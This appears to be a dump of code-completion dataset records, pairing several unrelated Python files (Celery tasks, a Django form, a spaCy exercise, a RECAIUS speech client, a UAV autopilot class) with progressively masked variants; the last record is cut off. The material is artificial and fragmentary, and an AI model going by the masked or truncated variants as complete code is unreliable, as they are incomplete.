"blob_id": "8a37299154aded37147e1650cbf52a5cdf7d91da",
"index": 4225,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nstart()\n",
"step-3": "from adventurelib import *\nfrom horror import *\nfrom dating import *\nfrom popquiz import *\nfrom comedy import *\nfrom island import *\nstart()\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from tasks import video_compress, video_upload
if __name__ == '__main__':
video_compress.apply_async(["a"],queue='high')
video_compress.apply_async(["b"],queue='low')
video_upload.apply_async(["c"], queue='low')
video_upload.apply_async(["d"], queue='high')
|
normal
|
{
"blob_id": "2cd7d4fe87de66e85bc0d060e2eaa68be39eed02",
"index": 9461,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n video_compress.apply_async(['a'], queue='high')\n video_compress.apply_async(['b'], queue='low')\n video_upload.apply_async(['c'], queue='low')\n video_upload.apply_async(['d'], queue='high')\n",
"step-3": "from tasks import video_compress, video_upload\nif __name__ == '__main__':\n video_compress.apply_async(['a'], queue='high')\n video_compress.apply_async(['b'], queue='low')\n video_upload.apply_async(['c'], queue='low')\n video_upload.apply_async(['d'], queue='high')\n",
"step-4": "from tasks import video_compress, video_upload\nif __name__ == '__main__':\n video_compress.apply_async([\"a\"],queue='high')\n video_compress.apply_async([\"b\"],queue='low')\n video_upload.apply_async([\"c\"], queue='low')\n video_upload.apply_async([\"d\"], queue='high')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from django import forms
class UploadForm(forms.Form):
file = forms.FileField(label="Json с данными об отправлении")
|
normal
|
{
"blob_id": "0878bfa1151371ff3aaa59f8be5ea9af74ada331",
"index": 4978,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass UploadForm(forms.Form):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass UploadForm(forms.Form):\n file = forms.FileField(label='Json с данными об отправлении')\n",
"step-4": "from django import forms\n\n\nclass UploadForm(forms.Form):\n file = forms.FileField(label='Json с данными об отправлении')\n",
"step-5": "from django import forms\n\n\nclass UploadForm(forms.Form):\n file = forms.FileField(label=\"Json с данными об отправлении\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import spacy
nlp = spacy.load("en_core_web_sm")
text = (
"Chick-fil-A is an American fast food restaurant chain headquartered in "
"the city of College Park, Georgia, specializing in chicken sandwiches."
)
# Disable the tagger and parser
with ____.____(____):
# Process the text
doc = ____
# Print the entities in the doc
print(____)
|
normal
|
{
"blob_id": "6eecf0ff1ad762089db6e9498e906e68b507370c",
"index": 1875,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith ____.____(____):\n doc = ____\n print(____)\n",
"step-3": "<mask token>\nnlp = spacy.load('en_core_web_sm')\ntext = (\n 'Chick-fil-A is an American fast food restaurant chain headquartered in the city of College Park, Georgia, specializing in chicken sandwiches.'\n )\nwith ____.____(____):\n doc = ____\n print(____)\n",
"step-4": "import spacy\nnlp = spacy.load('en_core_web_sm')\ntext = (\n 'Chick-fil-A is an American fast food restaurant chain headquartered in the city of College Park, Georgia, specializing in chicken sandwiches.'\n )\nwith ____.____(____):\n doc = ____\n print(____)\n",
"step-5": "import spacy\n\nnlp = spacy.load(\"en_core_web_sm\")\ntext = (\n \"Chick-fil-A is an American fast food restaurant chain headquartered in \"\n \"the city of College Park, Georgia, specializing in chicken sandwiches.\"\n)\n\n# Disable the tagger and parser\nwith ____.____(____):\n # Process the text\n doc = ____\n # Print the entities in the doc\n print(____)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
"""Transcoder with TOSHIBA RECAIUS API."""
import threading
import queue
import time
import numpy as np
from logzero import logger
import requests
import model.key
AUTH_URL = 'https://api.recaius.jp/auth/v2/tokens'
VOICE_URL = 'https://api.recaius.jp/asr/v2/voices'
class Transcoder:
"""Transcoder Class."""
def __init__(self):
"""Constructor."""
logger.info('__init__:Enter')
self._token = None
self.transcript = None
self._queue = queue.Queue()
def start(self, token):
"""Start recognition."""
logger.info('start:Enter')
self._token = token
threading.Thread(target=self._process).start()
def write_stream(self, buf):
"""Write audio stream."""
self._queue.put(buf)
def _process(self):
logger.info('_process:Enter')
token = self._authenticate()['token']
uuid = self._start_recognition(token)['uuid']
logger.info('start transcode')
i = 1
while True:
arr = self._stream_generator()
if(arr is None):
break
# logger.debug(f'{len(arr)} , {self._queue.qsize()}')
inline = np.hstack(arr)
arr_bytes = inline.tobytes('C')
header = {
'Content-Type': 'multipart/form-data',
'X-Token': token
}
files = {
'voice_id': ('', i, ''),
'voice': ('', arr_bytes, 'application/octet-stream')
}
resp = requests.put(
f'{VOICE_URL}/{uuid}', headers=header, files=files)
if(resp.status_code == 200):
logger.debug(resp.json())
result = resp.json()[0]
if(result[0] == 'TMP_RESULT' or result[0] == 'RESULT'):
self._write_result(result[1])
i = i + 1
self._flush_recognition(uuid, token, i)
while True:
if(self._get_result(uuid, token) is None):
break
time.sleep(0.1)
self._end_recognition(uuid, token)
logger.info('end transcode')
def _authenticate(self):
speechrecog_jajp_id = model.key.RECAIUS_ID
speechrecog_jajp_password = model.key.RECAIUS_PASSWORD
param = {
"speech_recog_jaJP": {
'service_id': speechrecog_jajp_id,
'password': speechrecog_jajp_password
}
}
return requests.post(AUTH_URL, json=param).json()
def _flush_recognition(self, uuid, token, i):
header = {
'Content-Type': 'application/json',
'X-Token': token
}
param = {
'voice_id': i,
}
resp = requests.put(
f'{VOICE_URL}/{uuid}/flush', headers=header, json=param)
if(resp.status_code == 200):
logger.debug(f'frush result:{resp.json()}')
return resp.json()
else:
logger.debug(f'flush result(status:{resp.status_code})')
def _get_result(self, uuid, token):
header = {
'X-Token': token
}
resp = requests.get(f'{VOICE_URL}/{uuid}/results', headers=header)
if(resp.status_code == 200):
logger.debug(f'get result:{resp.json()}')
return resp.json()
else:
logger.debug(f'get result(status:{resp.status_code})')
def _stream_generator(self):
arr = []
while True:
try:
v = self._queue.get_nowait()
# print(v)
if v is None:
return None
arr.append((v * 32767).astype(np.int16))
except queue.Empty:
if(len(arr) != 0):
break
else:
time.sleep(0.1)
return arr
def _start_recognition(self, token):
header = {
'Content-Type': 'application/json',
'X-Token': token
}
param = {
'model_id': 1
}
return requests.post(VOICE_URL, headers=header, json=param).json()
def _end_recognition(self, uuid, token):
header = {
'X-Token': token
}
resp = requests.delete(f'{VOICE_URL}/{uuid}', headers=header)
if(resp.status_code == 204):
logger.debug(f'delete result(status:{resp.status_code})')
def _write_result(self, transcipt):
self.transcript = transcipt
|
normal
|
{
"blob_id": "421b0c1871350ff541b4e56d1e18d77016884552",
"index": 5199,
"step-1": "<mask token>\n\n\nclass Transcoder:\n <mask token>\n\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n logger.info('__init__:Enter')\n self._token = None\n self.transcript = None\n self._queue = queue.Queue()\n\n def start(self, token):\n \"\"\"Start recognition.\"\"\"\n logger.info('start:Enter')\n self._token = token\n threading.Thread(target=self._process).start()\n <mask token>\n\n def _process(self):\n logger.info('_process:Enter')\n token = self._authenticate()['token']\n uuid = self._start_recognition(token)['uuid']\n logger.info('start transcode')\n i = 1\n while True:\n arr = self._stream_generator()\n if arr is None:\n break\n inline = np.hstack(arr)\n arr_bytes = inline.tobytes('C')\n header = {'Content-Type': 'multipart/form-data', 'X-Token': token}\n files = {'voice_id': ('', i, ''), 'voice': ('', arr_bytes,\n 'application/octet-stream')}\n resp = requests.put(f'{VOICE_URL}/{uuid}', headers=header,\n files=files)\n if resp.status_code == 200:\n logger.debug(resp.json())\n result = resp.json()[0]\n if result[0] == 'TMP_RESULT' or result[0] == 'RESULT':\n self._write_result(result[1])\n i = i + 1\n self._flush_recognition(uuid, token, i)\n while True:\n if self._get_result(uuid, token) is None:\n break\n time.sleep(0.1)\n self._end_recognition(uuid, token)\n logger.info('end transcode')\n\n def _authenticate(self):\n speechrecog_jajp_id = model.key.RECAIUS_ID\n speechrecog_jajp_password = model.key.RECAIUS_PASSWORD\n param = {'speech_recog_jaJP': {'service_id': speechrecog_jajp_id,\n 'password': speechrecog_jajp_password}}\n return requests.post(AUTH_URL, json=param).json()\n\n def _flush_recognition(self, uuid, token, i):\n header = {'Content-Type': 'application/json', 'X-Token': token}\n param = {'voice_id': i}\n resp = requests.put(f'{VOICE_URL}/{uuid}/flush', headers=header,\n json=param)\n if resp.status_code == 200:\n logger.debug(f'frush result:{resp.json()}')\n return resp.json()\n else:\n logger.debug(f'flush result(status:{resp.status_code})')\n <mask token>\n <mask token>\n\n def _start_recognition(self, token):\n header = {'Content-Type': 'application/json', 'X-Token': token}\n param = {'model_id': 1}\n return requests.post(VOICE_URL, headers=header, json=param).json()\n\n def _end_recognition(self, uuid, token):\n header = {'X-Token': token}\n resp = requests.delete(f'{VOICE_URL}/{uuid}', headers=header)\n if resp.status_code == 204:\n logger.debug(f'delete result(status:{resp.status_code})')\n\n def _write_result(self, transcipt):\n self.transcript = transcipt\n",
"step-2": "<mask token>\n\n\nclass Transcoder:\n <mask token>\n\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n logger.info('__init__:Enter')\n self._token = None\n self.transcript = None\n self._queue = queue.Queue()\n\n def start(self, token):\n \"\"\"Start recognition.\"\"\"\n logger.info('start:Enter')\n self._token = token\n threading.Thread(target=self._process).start()\n\n def write_stream(self, buf):\n \"\"\"Write audio stream.\"\"\"\n self._queue.put(buf)\n\n def _process(self):\n logger.info('_process:Enter')\n token = self._authenticate()['token']\n uuid = self._start_recognition(token)['uuid']\n logger.info('start transcode')\n i = 1\n while True:\n arr = self._stream_generator()\n if arr is None:\n break\n inline = np.hstack(arr)\n arr_bytes = inline.tobytes('C')\n header = {'Content-Type': 'multipart/form-data', 'X-Token': token}\n files = {'voice_id': ('', i, ''), 'voice': ('', arr_bytes,\n 'application/octet-stream')}\n resp = requests.put(f'{VOICE_URL}/{uuid}', headers=header,\n files=files)\n if resp.status_code == 200:\n logger.debug(resp.json())\n result = resp.json()[0]\n if result[0] == 'TMP_RESULT' or result[0] == 'RESULT':\n self._write_result(result[1])\n i = i + 1\n self._flush_recognition(uuid, token, i)\n while True:\n if self._get_result(uuid, token) is None:\n break\n time.sleep(0.1)\n self._end_recognition(uuid, token)\n logger.info('end transcode')\n\n def _authenticate(self):\n speechrecog_jajp_id = model.key.RECAIUS_ID\n speechrecog_jajp_password = model.key.RECAIUS_PASSWORD\n param = {'speech_recog_jaJP': {'service_id': speechrecog_jajp_id,\n 'password': speechrecog_jajp_password}}\n return requests.post(AUTH_URL, json=param).json()\n\n def _flush_recognition(self, uuid, token, i):\n header = {'Content-Type': 'application/json', 'X-Token': token}\n param = {'voice_id': i}\n resp = requests.put(f'{VOICE_URL}/{uuid}/flush', headers=header,\n json=param)\n if resp.status_code == 200:\n logger.debug(f'frush result:{resp.json()}')\n return resp.json()\n else:\n logger.debug(f'flush result(status:{resp.status_code})')\n <mask token>\n <mask token>\n\n def _start_recognition(self, token):\n header = {'Content-Type': 'application/json', 'X-Token': token}\n param = {'model_id': 1}\n return requests.post(VOICE_URL, headers=header, json=param).json()\n\n def _end_recognition(self, uuid, token):\n header = {'X-Token': token}\n resp = requests.delete(f'{VOICE_URL}/{uuid}', headers=header)\n if resp.status_code == 204:\n logger.debug(f'delete result(status:{resp.status_code})')\n\n def _write_result(self, transcipt):\n self.transcript = transcipt\n",
"step-3": "<mask token>\n\n\nclass Transcoder:\n <mask token>\n\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n logger.info('__init__:Enter')\n self._token = None\n self.transcript = None\n self._queue = queue.Queue()\n\n def start(self, token):\n \"\"\"Start recognition.\"\"\"\n logger.info('start:Enter')\n self._token = token\n threading.Thread(target=self._process).start()\n\n def write_stream(self, buf):\n \"\"\"Write audio stream.\"\"\"\n self._queue.put(buf)\n\n def _process(self):\n logger.info('_process:Enter')\n token = self._authenticate()['token']\n uuid = self._start_recognition(token)['uuid']\n logger.info('start transcode')\n i = 1\n while True:\n arr = self._stream_generator()\n if arr is None:\n break\n inline = np.hstack(arr)\n arr_bytes = inline.tobytes('C')\n header = {'Content-Type': 'multipart/form-data', 'X-Token': token}\n files = {'voice_id': ('', i, ''), 'voice': ('', arr_bytes,\n 'application/octet-stream')}\n resp = requests.put(f'{VOICE_URL}/{uuid}', headers=header,\n files=files)\n if resp.status_code == 200:\n logger.debug(resp.json())\n result = resp.json()[0]\n if result[0] == 'TMP_RESULT' or result[0] == 'RESULT':\n self._write_result(result[1])\n i = i + 1\n self._flush_recognition(uuid, token, i)\n while True:\n if self._get_result(uuid, token) is None:\n break\n time.sleep(0.1)\n self._end_recognition(uuid, token)\n logger.info('end transcode')\n\n def _authenticate(self):\n speechrecog_jajp_id = model.key.RECAIUS_ID\n speechrecog_jajp_password = model.key.RECAIUS_PASSWORD\n param = {'speech_recog_jaJP': {'service_id': speechrecog_jajp_id,\n 'password': speechrecog_jajp_password}}\n return requests.post(AUTH_URL, json=param).json()\n\n def _flush_recognition(self, uuid, token, i):\n header = {'Content-Type': 'application/json', 'X-Token': token}\n param = {'voice_id': i}\n resp = requests.put(f'{VOICE_URL}/{uuid}/flush', headers=header,\n json=param)\n if resp.status_code == 200:\n logger.debug(f'frush result:{resp.json()}')\n return resp.json()\n else:\n logger.debug(f'flush result(status:{resp.status_code})')\n\n def _get_result(self, uuid, token):\n header = {'X-Token': token}\n resp = requests.get(f'{VOICE_URL}/{uuid}/results', headers=header)\n if resp.status_code == 200:\n logger.debug(f'get result:{resp.json()}')\n return resp.json()\n else:\n logger.debug(f'get result(status:{resp.status_code})')\n\n def _stream_generator(self):\n arr = []\n while True:\n try:\n v = self._queue.get_nowait()\n if v is None:\n return None\n arr.append((v * 32767).astype(np.int16))\n except queue.Empty:\n if len(arr) != 0:\n break\n else:\n time.sleep(0.1)\n return arr\n\n def _start_recognition(self, token):\n header = {'Content-Type': 'application/json', 'X-Token': token}\n param = {'model_id': 1}\n return requests.post(VOICE_URL, headers=header, json=param).json()\n\n def _end_recognition(self, uuid, token):\n header = {'X-Token': token}\n resp = requests.delete(f'{VOICE_URL}/{uuid}', headers=header)\n if resp.status_code == 204:\n logger.debug(f'delete result(status:{resp.status_code})')\n\n def _write_result(self, transcipt):\n self.transcript = transcipt\n",
"step-4": "<mask token>\nAUTH_URL = 'https://api.recaius.jp/auth/v2/tokens'\nVOICE_URL = 'https://api.recaius.jp/asr/v2/voices'\n\n\nclass Transcoder:\n \"\"\"Transcoder Class.\"\"\"\n\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n logger.info('__init__:Enter')\n self._token = None\n self.transcript = None\n self._queue = queue.Queue()\n\n def start(self, token):\n \"\"\"Start recognition.\"\"\"\n logger.info('start:Enter')\n self._token = token\n threading.Thread(target=self._process).start()\n\n def write_stream(self, buf):\n \"\"\"Write audio stream.\"\"\"\n self._queue.put(buf)\n\n def _process(self):\n logger.info('_process:Enter')\n token = self._authenticate()['token']\n uuid = self._start_recognition(token)['uuid']\n logger.info('start transcode')\n i = 1\n while True:\n arr = self._stream_generator()\n if arr is None:\n break\n inline = np.hstack(arr)\n arr_bytes = inline.tobytes('C')\n header = {'Content-Type': 'multipart/form-data', 'X-Token': token}\n files = {'voice_id': ('', i, ''), 'voice': ('', arr_bytes,\n 'application/octet-stream')}\n resp = requests.put(f'{VOICE_URL}/{uuid}', headers=header,\n files=files)\n if resp.status_code == 200:\n logger.debug(resp.json())\n result = resp.json()[0]\n if result[0] == 'TMP_RESULT' or result[0] == 'RESULT':\n self._write_result(result[1])\n i = i + 1\n self._flush_recognition(uuid, token, i)\n while True:\n if self._get_result(uuid, token) is None:\n break\n time.sleep(0.1)\n self._end_recognition(uuid, token)\n logger.info('end transcode')\n\n def _authenticate(self):\n speechrecog_jajp_id = model.key.RECAIUS_ID\n speechrecog_jajp_password = model.key.RECAIUS_PASSWORD\n param = {'speech_recog_jaJP': {'service_id': speechrecog_jajp_id,\n 'password': speechrecog_jajp_password}}\n return requests.post(AUTH_URL, json=param).json()\n\n def _flush_recognition(self, uuid, token, i):\n header = {'Content-Type': 'application/json', 'X-Token': token}\n param = {'voice_id': i}\n resp = requests.put(f'{VOICE_URL}/{uuid}/flush', headers=header,\n json=param)\n if resp.status_code == 200:\n logger.debug(f'frush result:{resp.json()}')\n return resp.json()\n else:\n logger.debug(f'flush result(status:{resp.status_code})')\n\n def _get_result(self, uuid, token):\n header = {'X-Token': token}\n resp = requests.get(f'{VOICE_URL}/{uuid}/results', headers=header)\n if resp.status_code == 200:\n logger.debug(f'get result:{resp.json()}')\n return resp.json()\n else:\n logger.debug(f'get result(status:{resp.status_code})')\n\n def _stream_generator(self):\n arr = []\n while True:\n try:\n v = self._queue.get_nowait()\n if v is None:\n return None\n arr.append((v * 32767).astype(np.int16))\n except queue.Empty:\n if len(arr) != 0:\n break\n else:\n time.sleep(0.1)\n return arr\n\n def _start_recognition(self, token):\n header = {'Content-Type': 'application/json', 'X-Token': token}\n param = {'model_id': 1}\n return requests.post(VOICE_URL, headers=header, json=param).json()\n\n def _end_recognition(self, uuid, token):\n header = {'X-Token': token}\n resp = requests.delete(f'{VOICE_URL}/{uuid}', headers=header)\n if resp.status_code == 204:\n logger.debug(f'delete result(status:{resp.status_code})')\n\n def _write_result(self, transcipt):\n self.transcript = transcipt\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"Transcoder with TOSHIBA RECAIUS API.\"\"\"\nimport threading\nimport queue\nimport time\n\nimport numpy as np\nfrom logzero import logger\nimport requests\n\nimport model.key\n\nAUTH_URL = 'https://api.recaius.jp/auth/v2/tokens'\nVOICE_URL = 'https://api.recaius.jp/asr/v2/voices'\n\n\nclass Transcoder:\n \"\"\"Transcoder Class.\"\"\"\n\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n logger.info('__init__:Enter')\n self._token = None\n self.transcript = None\n self._queue = queue.Queue()\n\n def start(self, token):\n \"\"\"Start recognition.\"\"\"\n logger.info('start:Enter')\n self._token = token\n threading.Thread(target=self._process).start()\n\n def write_stream(self, buf):\n \"\"\"Write audio stream.\"\"\"\n self._queue.put(buf)\n\n def _process(self):\n logger.info('_process:Enter')\n token = self._authenticate()['token']\n uuid = self._start_recognition(token)['uuid']\n logger.info('start transcode')\n i = 1\n while True:\n arr = self._stream_generator()\n if(arr is None):\n break\n # logger.debug(f'{len(arr)} , {self._queue.qsize()}')\n inline = np.hstack(arr)\n arr_bytes = inline.tobytes('C')\n header = {\n 'Content-Type': 'multipart/form-data',\n 'X-Token': token\n }\n files = {\n 'voice_id': ('', i, ''),\n 'voice': ('', arr_bytes, 'application/octet-stream')\n }\n resp = requests.put(\n f'{VOICE_URL}/{uuid}', headers=header, files=files)\n if(resp.status_code == 200):\n logger.debug(resp.json())\n result = resp.json()[0]\n if(result[0] == 'TMP_RESULT' or result[0] == 'RESULT'):\n self._write_result(result[1])\n i = i + 1\n self._flush_recognition(uuid, token, i)\n while True:\n if(self._get_result(uuid, token) is None):\n break\n time.sleep(0.1)\n self._end_recognition(uuid, token)\n logger.info('end transcode')\n\n def _authenticate(self):\n speechrecog_jajp_id = model.key.RECAIUS_ID\n speechrecog_jajp_password = model.key.RECAIUS_PASSWORD\n param = {\n \"speech_recog_jaJP\": {\n 'service_id': speechrecog_jajp_id,\n 'password': speechrecog_jajp_password\n }\n }\n return requests.post(AUTH_URL, json=param).json()\n\n def _flush_recognition(self, uuid, token, i):\n header = {\n 'Content-Type': 'application/json',\n 'X-Token': token\n }\n param = {\n 'voice_id': i,\n }\n resp = requests.put(\n f'{VOICE_URL}/{uuid}/flush', headers=header, json=param)\n if(resp.status_code == 200):\n logger.debug(f'frush result:{resp.json()}')\n return resp.json()\n else:\n logger.debug(f'flush result(status:{resp.status_code})')\n\n def _get_result(self, uuid, token):\n header = {\n 'X-Token': token\n }\n resp = requests.get(f'{VOICE_URL}/{uuid}/results', headers=header)\n if(resp.status_code == 200):\n logger.debug(f'get result:{resp.json()}')\n return resp.json()\n else:\n logger.debug(f'get result(status:{resp.status_code})')\n\n def _stream_generator(self):\n arr = []\n while True:\n try:\n v = self._queue.get_nowait()\n # print(v)\n if v is None:\n return None\n arr.append((v * 32767).astype(np.int16))\n except queue.Empty:\n if(len(arr) != 0):\n break\n else:\n time.sleep(0.1)\n return arr\n\n def _start_recognition(self, token):\n header = {\n 'Content-Type': 'application/json',\n 'X-Token': token\n }\n param = {\n 'model_id': 1\n }\n return requests.post(VOICE_URL, headers=header, json=param).json()\n\n def _end_recognition(self, uuid, token):\n header = {\n 'X-Token': token\n }\n resp = requests.delete(f'{VOICE_URL}/{uuid}', headers=header)\n if(resp.status_code == 204):\n logger.debug(f'delete result(status:{resp.status_code})')\n\n def _write_result(self, transcipt):\n self.transcript = transcipt\n",
"step-ids": [
9,
10,
12,
14,
16
]
}
|
[
9,
10,
12,
14,
16
] |
from zope import schema
from zope import interface
from zope import component
from raptus.mailcone.rules_regex import _
from raptus.mailcone.rules import interfaces
class IRegexItem(interfaces.IConditionItem):
""" Interface for regex match filter
"""
regex = schema.TextLine(title=_('Regex'), required=True, description=_(
'a regular expression'))
source = schema.Choice(title=_('Source'), vocabulary=
'raptus.mailcone.mails.mailattributes', required=True)
|
normal
|
{
"blob_id": "fe83b45bdc5970d63deab66b26b16752cd8ad8ef",
"index": 7241,
"step-1": "<mask token>\n\n\nclass IRegexItem(interfaces.IConditionItem):\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass IRegexItem(interfaces.IConditionItem):\n <mask token>\n regex = schema.TextLine(title=_('Regex'), required=True, description=_(\n 'a regular expression'))\n source = schema.Choice(title=_('Source'), vocabulary=\n 'raptus.mailcone.mails.mailattributes', required=True)\n",
"step-3": "<mask token>\n\n\nclass IRegexItem(interfaces.IConditionItem):\n \"\"\" Interface for regex match filter\n \"\"\"\n regex = schema.TextLine(title=_('Regex'), required=True, description=_(\n 'a regular expression'))\n source = schema.Choice(title=_('Source'), vocabulary=\n 'raptus.mailcone.mails.mailattributes', required=True)\n",
"step-4": "from zope import schema\nfrom zope import interface\nfrom zope import component\nfrom raptus.mailcone.rules_regex import _\nfrom raptus.mailcone.rules import interfaces\n\n\nclass IRegexItem(interfaces.IConditionItem):\n \"\"\" Interface for regex match filter\n \"\"\"\n regex = schema.TextLine(title=_('Regex'), required=True, description=_(\n 'a regular expression'))\n source = schema.Choice(title=_('Source'), vocabulary=\n 'raptus.mailcone.mails.mailattributes', required=True)\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
"""
___________________________________________________
| _____ _____ _ _ _ |
| | __ \ | __ (_) | | | |
| | |__) |__ _ __ __ _ _ _| |__) || | ___ | |_ |
| | ___/ _ \ '_ \ / _` | | | | ___/ | |/ _ \| __| |
| | | | __/ | | | (_| | |_| | | | | | (_) | |_ |
| |_| \___|_| |_|\__, |\__,_|_| |_|_|\___/ \__| |
| __/ | |
| GNU/Linux based |___/ Multi-Rotor UAV Autopilot |
|___________________________________________________|
Movement Activity Class
Copyright (C) 2014 Tobias Simon, Integrated Communication Systems Group, TU Ilmenau
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details. """
from math import hypot
from time import sleep
from util.geomath import LinearInterpolation
from numpy import array, zeros
from pilot_pb2 import *
from activity import Activity, StabMixIn
from util.geomath import gps_add_meters, gps_meters_offset
from util.srtm import SrtmElevMap
_srtm_elev_map = SrtmElevMap()
class MoveActivity(Activity, StabMixIn):
Z_SPEED_MAX = 2
SRTM_SAFETY_ALT = 20
def __init__(self, icarus):
Activity.__init__(self, icarus)
self.canceled = False
def run(self):
# shortcut identifiers:
arg = self.icarus.arg
move_data = arg.move_data
pilot = self.icarus.pilot
params = pilot.params
fsm = self.icarus.fsm
prev_setp_rel = self.icarus.setpoints
start_gps = (params.start_lat, params.start_lon)
prev_setp_gps = gps_add_meters(start_gps, prev_setp_rel[0 : 2])
# calculate target x, y, z and move
coord = [None, None, None] # x, y, z setpoints
if arg.glob:
# set global lat, lon postion:
glob_sp = [None, None, None]
for i in xrange(3):
name = 'p%d' % i
if move_data.HasField(name):
glob_sp[i] = getattr(move_data, name)
print 'p0, p1, p2 = ', glob_sp
if arg.rel:
print 'glob, rel'
# interpret lat, lon, alt as relative
# covert previous x and y setpoints to rad, using start_lat, start_lon:
gps = list(prev_setp_gps)
for i in range(0, 2):
if glob_sp[i] != None:
gps[i] += glob_sp[i]
# convert from wsg84 to relative:
coord[0 : 2] = gps_meters_offset(start_gps, gps)
# add z value:
coord[2] = prev_setp_rel[2]
if glob_sp[2] != None:
coord[2] += glob_sp[2]
else:
print 'glob, abs'
# interpret lat, lon, alt as absolute
for i in range(0, 2):
if glob_sp[i] == None:
glob_sp[i] = prev_setp_gps[i]
print start_gps, glob_sp[0 : 2]
coord[0 : 2] = gps_meters_offset(start_gps, glob_sp[0 : 2])
if glob_sp[2] != None:
coord[2] = glob_sp[2] - params.start_alt
else:
coord[2] = prev_setp_rel[2]
else:
# local position update:
for i in xrange(3):
name = 'p%d' % i
if move_data.HasField(name):
if arg.rel:
print 'local, rel'
# relative local coordinate:
coord[i] = prev_setp_rel[i] + getattr(move_data, name)
else:
print 'local, abs'
# absolute local coordinate:
coord[i] = getattr(move_data, name)
else:
coord[i] = prev_setp_rel[i]
print 'coord output:', coord
self.icarus.setpoints = coord
# set position
pilot.set_ctrl_param(POS_E, coord[0])
pilot.set_ctrl_param(POS_N, coord[1])
"""
# did the altitude change?:
if coord[2] != prev_setp_rel[2]:
# set up linear z interpolation between start and destination points:
dist = hypot(prev_setp_rel[0] - coord[0], prev_setp_rel[1] - coord[1])
z_interp = LinearInterpolation(0.0, start_z, dist, coord[2])
# update z setpoint linearly between starting position and destination:
target_dist = hypot(pilot.mon[5], pilot.mon[6])
while target_dist > self.LAT_STAB_EPSILON:
sleep(1)
if self.canceled:
pilot.set_ctrl_param(POS_N, pilot.mon[0])
pilot.set_ctrl_param(POS_E, pilot.mon[1])
pilot.set_ctrl_param(POS_U, pilot.mon[2])
self.stabilize()
return # not going into hovering state
z = z_interp(dist - target_dist)
# check elevation map:
srtm_z = 1000.0 #_srtm_elev_map.lookup(lat, lon) - params.start_alt
if z < srtm_alt + self.SRTM_SAFETY_ALT:
z = srtm_alt + self.SRTM_SAFETY_ALT
pilot.set_ctrl_param(POS_Z, z)
"""
self.stabilize()
if not self.canceled:
fsm.handle('done')
def _cancel(self):
self.canceled = True
|
normal
|
{
"blob_id": "81f49c55edff7678e9d1745e39a8370e2c31c9ea",
"index": 8850,
"step-1": "\"\"\"\n ___________________________________________________\n | _____ _____ _ _ _ |\n | | __ \\ | __ (_) | | | |\n | | |__) |__ _ __ __ _ _ _| |__) || | ___ | |_ |\n | | ___/ _ \\ '_ \\ / _` | | | | ___/ | |/ _ \\| __| |\n | | | | __/ | | | (_| | |_| | | | | | (_) | |_ |\n | |_| \\___|_| |_|\\__, |\\__,_|_| |_|_|\\___/ \\__| |\n | __/ | |\n | GNU/Linux based |___/ Multi-Rotor UAV Autopilot |\n |___________________________________________________|\n \n Movement Activity Class\n\n Copyright (C) 2014 Tobias Simon, Integrated Communication Systems Group, TU Ilmenau\n\n This program is free software; you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation; either version 2 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details. \"\"\"\n\n\nfrom math import hypot\nfrom time import sleep\nfrom util.geomath import LinearInterpolation\nfrom numpy import array, zeros\nfrom pilot_pb2 import *\nfrom activity import Activity, StabMixIn\nfrom util.geomath import gps_add_meters, gps_meters_offset\nfrom util.srtm import SrtmElevMap\n\n\n_srtm_elev_map = SrtmElevMap()\n\n\nclass MoveActivity(Activity, StabMixIn):\n\n\n Z_SPEED_MAX = 2\n SRTM_SAFETY_ALT = 20\n\n\n def __init__(self, icarus):\n Activity.__init__(self, icarus)\n self.canceled = False\n\n\n def run(self):\n # shortcut identifiers:\n arg = self.icarus.arg\n move_data = arg.move_data\n pilot = self.icarus.pilot\n params = pilot.params\n fsm = self.icarus.fsm\n prev_setp_rel = self.icarus.setpoints\n start_gps = (params.start_lat, params.start_lon)\n prev_setp_gps = gps_add_meters(start_gps, prev_setp_rel[0 : 2])\n \n # calculate target x, y, z and move\n coord = [None, None, None] # x, y, z setpoints\n if arg.glob:\n # set global lat, lon postion:\n glob_sp = [None, None, None]\n for i in xrange(3):\n name = 'p%d' % i\n if move_data.HasField(name):\n glob_sp[i] = getattr(move_data, name)\n print 'p0, p1, p2 = ', glob_sp\n if arg.rel:\n print 'glob, rel'\n # interpret lat, lon, alt as relative\n # covert previous x and y setpoints to rad, using start_lat, start_lon:\n gps = list(prev_setp_gps)\n for i in range(0, 2):\n if glob_sp[i] != None:\n gps[i] += glob_sp[i]\n # convert from wsg84 to relative:\n coord[0 : 2] = gps_meters_offset(start_gps, gps)\n # add z value:\n coord[2] = prev_setp_rel[2]\n if glob_sp[2] != None:\n coord[2] += glob_sp[2]\n else:\n print 'glob, abs'\n # interpret lat, lon, alt as absolute\n for i in range(0, 2):\n if glob_sp[i] == None:\n glob_sp[i] = prev_setp_gps[i]\n print start_gps, 